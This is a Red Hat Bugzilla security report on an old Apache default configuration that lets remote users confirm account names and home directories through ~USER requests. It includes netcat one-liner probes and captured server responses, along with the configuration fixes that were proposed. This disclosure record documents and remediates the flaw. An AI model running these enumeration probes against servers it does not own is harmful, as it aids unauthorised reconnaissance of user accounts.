Bug 20434 - remote user can verify valid username and get home directory for any user
remote user can verify valid username and get home directory for any user
Status: CLOSED CURRENTRELEASE
Product: Red Hat Linux
Classification: Retired
Component: apache (Show other bugs)
7.0
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Nalin Dahyabhai
Dale Lovelace
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-11-06 14:04 EST by P Jones
Modified: 2007-04-18 12:29 EDT (History)
5 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-09-27 23:40:34 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description P Jones 2000-11-06 14:04:38 EST
By default install, the 404 script will expand ~USER to the users's home directory if user exists. THUS
( sleep 5 ; echo GET ~root/notfound 1.0 ; echo ; sleep 5 ) | nc www.domain.com 80 
will return:

....
The requested URL /root/notfound was not found on this server.<P>
indicating that the user root does exits and has his home directory in /root, 
or... (for, say "nobody", instead of "root")
The requested URL //notfound was not found...
or for "nouser" (who doesn't exist), I get a 400 error (Bad request)

NOTE that all these requests are handled better if the request includes a '/' before the ~, as thus:
( sleep 5 ; echo GET /~root/notfound 1.0 ; echo ; sleep 5 ) | nc www.domain.com 80
Comment 1 Arenas Belon, Carlo Marcelo 2000-11-25 22:03:49 EST
There are 2 posible solutions IMHO

add to <Directory /> 

  order deny,allow
  deny from all

what is a really good idea for a secure default configuration. and then all what
is shown is a "Forbidden" message no matter if the user exists or not ;)

or comment 

#UserDir public_html

and also (as the mod_userdir module is just wasting memory)

#LoadModule userdir_module      modules/mod_userdir.so
#AddModule mod_userdir.c

actually both can be done without taking any functionality as usually all the
directories on RedHat are created as 0700 and need to be at least 0555 for
UserDir to work ;)
Comment 2 R P Herrold 2001-09-27 23:40:29 EDT
This exploit was mentioned again last week on main bugtraq of Vuln-devel list at
SecurityFocus, and Red Hat's config file waa held up as a bad example by name.

--------------------------

At least with a stock RH 7.1 install, the defect is still present (victim domain
elided):


[herrold@dell4 herrold]$ ( sleep 5 ; echo GET ~root/notfound 1.0 ; echo ; sleep
5 ) | nc aaa.bbb.net 80
HTTP/1.1 404 Not Found
Date: Fri, 28 Sep 2001 03:36:23 GMT
Server: Apache/1.3.19 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1 mod_perl/1.24_01
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /root/notfound was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.19 Server at aaa.bbb.net Port 80</ADDRESS>
</BODY></HTML>
[herrold@dell4 herrold]$ ( sleep 5 ; echo GET ~rsadft/notfound 1.0 ; echo ;
sleep 5 ) | nc aaa.bbb.net 80
HTTP/1.1 400 Bad Request
Date: Fri, 28 Sep 2001 03:36:40 GMT
Server: Apache/1.3.19 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1 mod_perl/1.24_01
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Invalid URI in request GET ~rsadft/notfound 1.0<P>
<HR>
<ADDRESS>Apache/1.3.19 Server at aaa.bbb.net Port 80</ADDRESS>
</BODY></HTML>
[herrold@dell4 herrold]$
Comment 3 Joe Orton 2002-09-11 16:15:22 EDT
This was fixed in the default Apache configuration in Red Hat Linux 7.3, which 
does not disable mod_userdir by default.
Comment 4 Joe Orton 2002-09-11 16:16:21 EDT
... which does not *enable* userdir by default, of course, I meant.  Apologies
for the spam.

Note You need to log in before you can comment on or make changes to this bug.